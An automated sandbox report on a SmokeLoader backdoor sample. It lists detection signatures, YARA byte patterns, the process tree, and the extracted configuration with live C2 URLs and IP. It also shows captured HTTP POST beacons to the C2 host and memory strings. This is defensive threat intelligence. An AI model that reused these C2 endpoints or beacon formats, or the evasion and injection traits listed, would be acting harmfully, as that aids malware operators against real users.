
Windows Analysis Report
e6reA52T4I.exe

Overview

General Information

Sample name: e6reA52T4I.exe
renamed because original name is a hash value
Original sample name: b05425661616539e0e68493474745880f03300d9b5cca894af732da010869778.exe
Analysis ID: 1571560
MD5: 855e7cd7024d340b83123c75d9d4fb1c
SHA1: 3323fdcd6ce66e3c1b971b098f26a562892b8c30
SHA256: b05425661616539e0e68493474745880f03300d9b5cca894af732da010869778
Tags: 213-21-220-222, exe, user-JAMESWT_MHT
Infos:

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • e6reA52T4I.exe (PID: 2304 cmdline: "C:\Users\user\Desktop\e6reA52T4I.exe" MD5: 855E7CD7024D340B83123C75D9D4FB1C)
    • e6reA52T4I.exe (PID: 4036 cmdline: "C:\Users\user\Desktop\e6reA52T4I.exe" MD5: 855E7CD7024D340B83123C75D9D4FB1C)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • hdeufvw (PID: 6468 cmdline: C:\Users\user\AppData\Roaming\hdeufvw MD5: 855E7CD7024D340B83123C75D9D4FB1C)
    • hdeufvw (PID: 1384 cmdline: C:\Users\user\AppData\Roaming\hdeufvw MD5: 855E7CD7024D340B83123C75D9D4FB1C)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
Attribution: SMOKY SPIDER
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2020, "C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
Source | Rule | Description | Author | Strings
00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |

Source | Rule | Description | Author | Strings
5.2.hdeufvw.8615a0.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
6.2.hdeufvw.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
2.2.e6reA52T4I.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
0.2.e6reA52T4I.exe.9315a0.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |

System Summary

Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\hdeufvw, CommandLine: C:\Users\user\AppData\Roaming\hdeufvw, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hdeufvw, NewProcessName: C:\Users\user\AppData\Roaming\hdeufvw, OriginalFileName: C:\Users\user\AppData\Roaming\hdeufvw, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Users\user\AppData\Roaming\hdeufvw, ProcessId: 6468, ProcessName: hdeufvw

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-09T14:53:55.228635+0100 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:53:56.103539+0100 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:54:21.048517+0100 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:54:21.650388+0100 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-09T14:53:55.228635+0100 | 2851815 | 1 | A Network Trojan was detected | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:53:56.103539+0100 | 2851815 | 1 | A Network Trojan was detected | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:54:21.048517+0100 | 2851815 | 1 | A Network Trojan was detected | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP
2024-12-09T14:54:21.650388+0100 | 2851815 | 1 | A Network Trojan was detected | 192.168.2.10 | 49705 | 188.40.141.211 | 80 | TCP


AV Detection

Source: e6reA52T4I.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\hdeufvw | Avira: detection malicious, Label: HEUR/AGEN.1312455
Source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2020, "C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
Source: C:\Users\user\AppData\Roaming\hdeufvw | ReversingLabs: Detection: 81%
Source: e6reA52T4I.exe | ReversingLabs: Detection: 87%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\hdeufvw | Joe Sandbox ML: detected
Source: e6reA52T4I.exe | Joe Sandbox ML: detected
Source: e6reA52T4I.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_004257E0 GetConsoleProcessList,CharUpperA,CharToOemBuffA,CharToOemBuffA,GetConsoleProcessList,WriteProfileStringW,RegisterClassA,SetThreadContext,GetFileAttributesExA,_fputc,GetConsoleAliasW,WriteConsoleOutputCharacterA,GetFileType,GetConsoleAliasW,WriteConsoleOutputCharacterA,GetFileType,GlobalAlloc,GetWindowsDirectoryW,SetThreadAffinityMask,SetProcessShutdownParameters,GetWindowsDirectoryW,SetThreadAffinityMask,ReadConsoleOutputCharacterA,SetProcessShutdownParameters,BuildCommDCBAndTimeoutsW,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,GetPrivateProfileStringW,GetPrivateProfileStringW,AddAtomA,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomA,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleCursorInfo,VirtualProtect,InterlockedDecrement,GetCharWidthFloatW,ClearEventLogA,InterlockedDecrement,GetCharWidthFloatW,ClearEventLogA,GlobalUnfix,OpenWaitableTimerW,GlobalFlags,LocalFlags,LoadLibraryW,GetConsoleCursorInfo,SetConsoleCP,TerminateProcess,FindFirstFileA,InterlockedIncrement,GetVolumeNameForVolumeMountPointA,GetModuleHandleW,CreateActCtxA,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GetModuleHandleA,CreateEventA,ExpandEnvironmentStringsW,SetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,0_2_004257E0
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0042545B WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_0042545B
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00425400 WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_00425400
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_004255C0 DisconnectNamedPipe,AddAtomA,GetSystemWindowsDirectoryW,ReadConsoleInputA,WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_004255C0
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_004255F6 ReadConsoleInputA,WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_004255F6
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_004255F4 ReadConsoleInputA,WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_004255F4
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00425659 WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_00425659

Networking

Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.10:49705 -> 188.40.141.211:80
Source: Network traffic | Suricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.10:49705 -> 188.40.141.211:80
Source: C:\Windows\explorer.exe | Network Connect: 188.40.141.211 80
Source: Malware configuration extractor | URLs: http://host-file-host6.com/
Source: Malware configuration extractor | URLs: http://host-host-file8.com/
Source: Joe Sandbox View | IP Address: 188.40.141.211 188.40.141.211
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://spylvifr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 265 | Host: host-file-host6.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ubpctscp.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 144 | Host: host-file-host6.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lrvsgmets.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 147 | Host: host-file-host6.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://iwtkhvgidl.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 274 | Host: host-file-host6.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: host-file-host6.com
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://spylvifr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 265 | Host: host-file-host6.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Content-Length: 7 | Content-Type: application/octet-stream | Date: Mon, 09 Dec 2024 13:53:54 GMT | Data Raw: 03 00 00 00 7b fa b1 | Data Ascii: {
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Content-Length: 0 | Content-Type: application/octet-stream | Date: Mon, 09 Dec 2024 13:53:55 GMT
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Content-Length: 7 | Content-Type: application/octet-stream | Date: Mon, 09 Dec 2024 13:54:20 GMT | Data Raw: 03 00 00 00 7b fa b1 | Data Ascii: {
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Content-Length: 0 | Content-Type: application/octet-stream | Date: Mon, 09 Dec 2024 13:54:21 GMT
Source: explorer.exe, 00000003.00000000.1567258720.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.00000000094DC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000000.1567258720.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.00000000094DC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000000.1567258720.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.00000000094DC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000002.2732849760.000000000DFA0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159062286.000000000D54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2733305074.0000000010400000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159452142.000000000D47A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://host-file-host6.com/
Source: explorer.exe, 00000003.00000003.2159062286.000000000D54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://host-file-host6.com/tingsTU;
Source: explorer.exe, 00000003.00000003.2160992593.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159452142.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160168941.000000000D046000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://iwtkhvgidl.com/
Source: explorer.exe, 00000003.00000003.2160992593.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160168941.000000000D046000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://iwtkhvgidl.com/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159452142.000000000D47A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://lrvsgmets.com/
Source: explorer.exe, 00000003.00000003.2159062286.000000000D54C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://lrvsgmets.com/ings#U
Source: explorer.exe, 00000003.00000000.1567258720.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.00000000094DC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000003.2160246624.000000000305D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2725144997.000000000305D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1560749669.000000000305D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000002.2727383323.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2724814325.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2727361366.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000003.00000003.2158520711.000000000D47A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ubpctscp.net/
Source: explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin
Source: explorer.exe, 00000003.00000003.2159452142.000000000D1F9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000002.2728248249.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/$
Source: explorer.exe, 00000003.00000002.2728248249.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/X
Source: explorer.exe, 00000003.00000000.1560749669.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2723738796.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1559516725.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160246624.0000000002FBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2725144997.0000000002FC0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000002.2728248249.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1560749669.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2725120474.0000000002FAE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2160909018.0000000002FAD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000002.2728248249.0000000009390000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.0000000009390000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comWzE
Source: explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.comE
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hJkDs.img
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.comNaP0B
Source: explorer.exe, 00000003.00000000.1569386783.000000000CFF4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2159155796.000000000D0B8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcemberZ
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000002.2729091529.0000000009730000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567932050.0000000009730000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/bat
Source: explorer.exe, 00000003.00000000.1569386783.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2158520711.000000000D1D5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2731587157.000000000D1D8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com576
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/a
